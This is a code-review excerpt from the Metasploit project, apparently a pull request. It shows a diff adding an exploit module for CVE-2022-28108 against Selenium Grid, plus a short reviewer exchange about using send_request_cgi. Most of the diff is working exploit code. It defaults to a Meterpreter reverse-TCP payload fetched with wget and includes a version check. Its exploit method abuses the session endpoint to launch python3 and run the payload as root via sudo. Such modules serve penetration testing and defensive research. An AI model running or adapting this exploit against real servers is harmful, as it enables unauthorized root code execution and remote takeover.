modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb

```diff
@@ -0,0 +1,116 @@
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-28108'],
+          ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'],
+          ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
+        ],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-18',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(4444),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+    return Exploit::CheckCode::Unknown unless js_code
+
+    json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
+    json_data = JSON.parse(json_str)
+    return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
+
+    # Extract the version
+    version = Rex::Version.new(json_data['version'])
+    if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
+      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
+    end
+
+    print_status("Version #{version} detected, which is vulnerable")
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    url = URI.parse(full_uri(normalize_uri(target_uri.path, 'wd/hub/session')))
+
+    # Create the request body as a Ruby hash and then convert it to JSON
+    body = {
+      'capabilities' => {
+        'alwaysMatch' => {
+          'browserName' => 'chrome',
+          'goog:chromeOptions' => {
+            'binary' => '/usr/bin/python3',
+            'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"]
+          }
+        }
+      }
+    }.to_json
+
+    # Set up the HTTP request
+    request = Net::HTTP::Post.new(url.path, { 'Content-Type' => 'text/plain' })
+    request.body = body
+
+    # Make the HTTP request (with no-cors mode implied)
+    http = Net::HTTP.new(url.host, url.port)
+    http.request(request)
```

Comment:
Please use the `send_request_cgi` method for HTTP requests.

Reply:
Thanks! Updated to use `send_request_cgi`. https://github.com/rapid7/metasploit-framework/pull/19769/commits/6c5952d3b6b5563c47657c04c2f85974cc2e5163